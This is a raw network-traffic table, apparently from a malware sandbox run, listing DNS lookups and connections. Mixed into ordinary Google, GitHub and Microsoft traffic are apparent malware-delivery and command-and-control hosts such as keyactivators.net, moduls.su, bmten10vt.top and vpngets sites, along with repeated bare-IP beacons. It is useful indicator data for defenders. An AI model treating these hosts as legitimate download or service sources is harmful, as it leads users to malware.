| US | 8.8.8.8:53 | ingest.make.rvapps.io | udp |
| US | 3.211.199.134:443 | ingest.make.rvapps.io | tcp |
| US | 3.211.199.134:443 | ingest.make.rvapps.io | tcp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 134.199.211.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 3.211.199.134:443 | ingest.make.rvapps.io | tcp |
| US | 8.8.8.8:53 | 4.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.go-mpulse.net | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.200.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 195.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | 3.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 209.85.147.94:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 94.147.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.200.14:443 | www.youtube.com | tcp |
| GB | 142.250.200.14:443 | www.youtube.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 216.58.201.98:443 | googleads.g.doubleclick.net | tcp |
| GB | 142.250.178.6:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 172.217.169.74:443 | jnn-pa.googleapis.com | udp |
| GB | 216.58.201.98:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 6.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | tcp |
| GB | 142.250.200.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | repository-images.githubusercontent.com | udp |
| US | 185.199.110.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | repository-images.githubusercontent.com | tcp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 6.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 216.58.201.110:443 | google.com | tcp |
| US | 8.8.8.8:53 | e2c16.gcp.gvt2.com | udp |
| DE | 34.89.141.94:443 | e2c16.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | private-user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 94.141.89.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bit.ly | udp |
| US | 67.199.248.11:443 | bit.ly | tcp |
| US | 67.199.248.11:443 | bit.ly | tcp |
| US | 67.199.248.11:443 | bit.ly | udp |
| US | 8.8.8.8:53 | 11.248.199.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c39.gcp.gvt2.com | udp |
| FI | 35.217.17.196:443 | e2c39.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 196.17.217.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 172.217.169.74:443 | chromewebstore.googleapis.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c14.gcp.gvt2.com | udp |
| BE | 35.240.1.200:443 | e2c14.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| AU | 142.250.66.227:443 | beacons2.gvt2.com | tcp |
| AU | 142.250.66.227:443 | beacons2.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.1.240.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e2c15.gcp.gvt2.com | udp |
| GB | 34.105.225.79:443 | e2c15.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 227.66.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.225.105.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.201.110:443 | google.com | udp |
| US | 8.8.8.8:53 | pvgbv.gorda.site | udp |
| US | 188.114.96.2:443 | pvgbv.gorda.site | tcp |
| US | 188.114.96.2:443 | pvgbv.gorda.site | tcp |
| US | 8.8.8.8:53 | gorda.site | udp |
| US | 8.8.8.8:53 | vpngets.org | udp |
| US | 188.114.97.2:443 | vpngets.org | tcp |
| US | 8.8.8.8:53 | vpngets.com | udp |
| US | 172.67.131.227:443 | vpngets.com | tcp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 172.67.131.227:443 | vpngets.com | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ws.tildacdn.com | udp |
| DE | 162.55.188.142:443 | neo.tildacdn.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 227.131.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.188.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.180.250.142.in-addr.arpa | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.227.65:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 52.217.227.65:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 65.227.217.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| GB | 193.3.17.197:443 | stat.tildacdn.com | tcp |
| US | 8.8.8.8:53 | 197.17.3.193.in-addr.arpa | udp |
| US | 188.114.96.2:443 | vpngets.org | udp |
| US | 188.114.97.2:443 | vpngets.org | udp |
| US | 8.8.8.8:53 | voloz.site | udp |
| US | 172.67.145.170:443 | voloz.site | tcp |
| US | 8.8.8.8:53 | vpnsget.pw | udp |
| US | 172.67.165.66:443 | vpnsget.pw | tcp |
| US | 8.8.8.8:53 | 170.145.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.165.67.172.in-addr.arpa | udp |
| AU | 142.250.66.227:443 | beacons2.gvt2.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| DE | 140.82.121.6:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 185.199.108.133:443 | user-images.githubusercontent.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | keyactivators.net | udp |
| US | 173.252.167.210:443 | keyactivators.net | tcp |
| US | 173.252.167.210:443 | keyactivators.net | tcp |
| US | 173.252.167.210:443 | keyactivators.net | tcp |
| US | 8.8.8.8:53 | 210.167.252.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | moduls.su | udp |
| US | 173.252.167.210:443 | keyactivators.net | udp |
| US | 8.8.8.8:53 | stats.wp.com | udp |
| US | 188.114.97.2:80 | moduls.su | tcp |
| US | 8.8.8.8:53 | modules.su | udp |
| US | 172.67.128.47:80 | modules.su | tcp |
| US | 192.0.76.3:443 | stats.wp.com | tcp |
| NL | 62.133.61.7:3333 | tcp | |
| US | 8.8.8.8:53 | pixel.wp.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.187.234:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 47.128.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.76.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.61.133.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.187.250.142.in-addr.arpa | udp |
| US | 192.0.76.3:443 | pixel.wp.com | udp |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| US | 8.8.8.8:53 | fellzobr.com | udp |
| NL | 185.14.29.199:80 | fellzobr.com | tcp |
| US | 8.8.8.8:53 | 188.10.196.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | download.alloutpest.com.sg | udp |
| SG | 23.106.127.3:443 | download.alloutpest.com.sg | tcp |
| SG | 23.106.127.3:443 | download.alloutpest.com.sg | tcp |
| SG | 23.106.127.3:443 | download.alloutpest.com.sg | tcp |
| US | 8.8.8.8:53 | 3.127.106.23.in-addr.arpa | udp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| US | 8.8.8.8:53 | qsrc.sg | udp |
| SG | 43.229.84.147:443 | qsrc.sg | tcp |
| SG | 43.229.84.147:443 | qsrc.sg | tcp |
| US | 8.8.8.8:53 | 147.84.229.43.in-addr.arpa | udp |
| NL | 45.159.189.140:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| US | 188.114.97.2:80 | moduls.su | tcp |
| US | 172.67.128.47:80 | modules.su | tcp |
| NL | 62.133.61.7:3333 | tcp | |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 45.159.189.140:80 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 92.65.42.20.in-addr.arpa | udp |
| NL | 89.23.103.42:80 | tcp | |
| SG | 23.106.127.3:443 | download.alloutpest.com.sg | tcp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| US | 8.8.8.8:53 | noxplayer.org | udp |
| US | 104.21.23.60:443 | noxplayer.org | tcp |
| US | 8.8.8.8:53 | 60.23.21.104.in-addr.arpa | udp |
| US | 104.21.23.60:443 | noxplayer.org | udp |
| NL | 45.159.189.140:80 | tcp | |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| US | 188.114.97.2:80 | moduls.su | tcp |
| US | 172.67.128.47:80 | modules.su | tcp |
| NL | 45.159.189.140:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.win-rar.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| US | 8.8.8.8:53 | 163.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| US | 172.253.123.94:443 | id.google.com | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.123.253.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 188.114.97.2:80 | moduls.su | tcp |
| US | 172.67.128.47:80 | modules.su | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | tcp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| US | 188.114.97.2:80 | moduls.su | tcp |
| US | 172.67.128.47:80 | modules.su | tcp |
| NL | 45.159.189.140:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| US | 188.114.97.2:80 | moduls.su | tcp |
| US | 172.67.128.47:80 | modules.su | tcp |
| US | 8.8.8.8:53 | VocespJXXrvzFbcXoyMlQ.VocespJXXrvzFbcXoyMlQ | udp |
| US | 8.8.8.8:53 | moduls.su | udp |
| US | 172.67.141.128:80 | moduls.su | tcp |
| US | 8.8.8.8:53 | modules.su | udp |
| US | 172.67.128.47:80 | modules.su | tcp |
| US | 8.8.8.8:53 | 128.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| GB | 172.165.69.228:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.69.228:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| GB | 88.221.135.81:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 164.128.123.92.in-addr.arpa | udp |
| GB | 92.123.128.164:443 | www.bing.com | udp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | bmten10vt.top | udp |
| RU | 85.193.82.4:80 | bmten10vt.top | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| GB | 92.123.128.164:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 4.82.193.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 92.123.128.152:443 | r.bing.com | tcp |
| GB | 92.123.128.152:443 | r.bing.com | tcp |
| GB | 92.123.128.146:443 | th.bing.com | tcp |
| GB | 92.123.128.146:443 | th.bing.com | tcp |
| GB | 92.123.128.152:443 | r.bing.com | udp |
| GB | 92.123.128.152:443 | r.bing.com | udp |
| GB | 92.123.128.146:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | 152.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.128.123.92.in-addr.arpa | udp |
| RU | 85.193.82.4:80 | bmten10vt.top | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| GB | 172.165.69.228:443 | nav-edge.smartscreen.microsoft.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.110.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.133:443 | user-images.githubusercontent.com | tcp |
| RU | 85.193.82.4:80 | bmten10vt.top | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.46:443 | clients2.google.com | udp |
| GB | 142.250.200.46:443 | clients2.google.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| US | 172.67.141.128:80 | moduls.su | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| US | 172.67.128.47:80 | modules.su | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| RU | 194.87.107.145:10480 | tcp | |
| US | 8.8.8.8:53 | 145.107.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 5.121.82.140.in-addr.arpa | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | user-images.githubusercontent.com | tcp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| US | 172.67.141.128:80 | moduls.su | tcp |
| US | 172.67.128.47:80 | modules.su | tcp |
| US | 8.8.8.8:53 | 147.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
| NL | 45.159.189.140:80 | tcp | |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| GB | 142.250.178.4:443 | www.google.com | tcp |
| GB | 142.250.178.4:443 | www.google.com | udp |
| GB | 142.250.200.46:443 | clients2.google.com | udp |
| GB | 142.250.200.46:443 | clients2.google.com | tcp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| NL | 89.23.103.42:80 | tcp | |
| US | 172.67.141.128:80 | moduls.su | tcp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| US | 172.67.128.47:80 | modules.su | tcp |
| IT | 185.196.10.188:80 | 185.196.10.188 | tcp |
| NL | 89.23.103.42:80 | tcp | |
| NL | 45.159.189.140:80 | tcp | |
| DE | 140.82.121.5:443 | api.github.com | tcp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
